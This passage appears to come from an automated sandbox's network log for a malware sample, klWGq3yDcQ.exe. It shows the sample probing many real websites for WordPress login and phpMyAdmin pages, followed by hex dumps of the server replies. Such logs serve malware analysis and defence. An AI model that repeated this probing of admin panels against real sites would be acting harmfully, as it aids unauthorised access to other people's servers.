                                                                                                                                                                                                    Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><script src="https://www.google.com/adsense/domains/caf.js?abp=1" type="text/javascript"></script><noscript><style>#content-main{display:none}</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.521672964 CET166INData Raw: 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77
                                                                                                                                                                                                    Data Ascii: www.enable-javascript.com/">instructions how to enable JavaScript in your web browser</a>.</div></noscript><scri
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.521684885 CET557INData Raw: 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 52 5f 53 59 53 54 45 4d 3d 22 50 57 22 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74
                                                                                                                                                                                                    Data Ascii: pt type="application/javascript">window.LANDER_SYSTEM="PW"</script><script type="text/javascript">var abp=void 0</script><script type="text/javascript" src="/px.js?ch=1&abp=1"></script><script type="text/javascript" src="/px.js?ch=2&abp=1"></s
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.534429073 CET557INData Raw: 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 52 5f 53 59 53 54 45 4d 3d 22 50 57 22 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74
                                                                                                                                                                                                    Data Ascii: pt type="application/javascript">window.LANDER_SYSTEM="PW"</script><script type="text/javascript">var abp=void 0</script><script type="text/javascript" src="/px.js?ch=1&abp=1"></script><script type="text/javascript" src="/px.js?ch=2&abp=1"></s


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    101192.168.2.456383191.6.210.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.184374094 CET230OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: esistem.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.402869940 CET461INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 262
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 26 6e 62 73 70 3b 3c 2f 70 3e 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 26 6e 62 73 70 3b 3c 2f 70 3e 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 26 6e 62 73 70 3b 3c 2f 70 3e 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 26 6e 62 73 70 3b 3c 2f 70 3e 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 27 41 72 69 61 6c 27 20 73 69 7a 65 3d 27 33 27 3e 45 72 72 6f 20 34 30 33 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 3c 70 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 27 4d 53 20 53 61 6e 73 20 53 65 72 69 66 27 20 73 69 7a 65 3d 27 32 27 3e 41 63 65 73 73 6f 20 6e 65 67 61 64 6f 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e
                                                                                                                                                                                                    Data Ascii: <p align='center'>&nbsp;</p><p align='center'>&nbsp;</p><p align='center'>&nbsp;</p><p align='center'>&nbsp;</p><p align='center'><b><font face='Arial' size='3'>Erro 403</font></b></p><p align='center'><font face='MS Sans Serif' size='2'>Acesso negado</font></p>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.403399944 CET272OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: esistem.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://esistem.com.br/wp-login.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.621352911 CET762INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                                                                                                                                                                    ETag: "1e8-595ad1aad5040"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Content-Length: 488
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    102192.168.2.45645974.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.184380054 CET232OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.373527050 CET280INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 83
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.374361992 CET276OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://himontessori.com/wp-login.php


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    103192.168.2.45649572.167.58.161806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.184443951 CET226OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.341968060 CET489INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://webstamp.ca/phpmyadmin/
                                                                                                                                                                                                    Content-Length: 239
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://webstamp.ca/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    104192.168.2.45659567.205.16.72806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.186343908 CET227OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: capforge.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.281147957 CET491INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://capforge.com/phpmyadmin/
                                                                                                                                                                                                    Content-Length: 240
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://capforge.com/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    105192.168.2.456148148.66.138.193806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.228060007 CET229OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: octetpowers.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.692622900 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                                    Connection: Upgrade
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Expires: 0
                                                                                                                                                                                                    Content-Length: 1699
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container te
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.692636967 CET758INData Raw: 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35
                                                                                                                                                                                                    Data Ascii: xt-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="round" style="fill:none;stroke:#ff8a00;stroke-width:8" /> <text x="42" y="74" fill="#ff8a00" font-family="sans-serif" font-wei


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    106192.168.2.45650774.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.228502035 CET231OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.423115969 CET499INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://himontessori.com/phpmyadmin/
                                                                                                                                                                                                    Content-Length: 244
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://himontessori.com/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    107192.168.2.45653489.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.237350941 CET227OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: viidelta.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.422318935 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    X-UD-METHOD: vm_construction
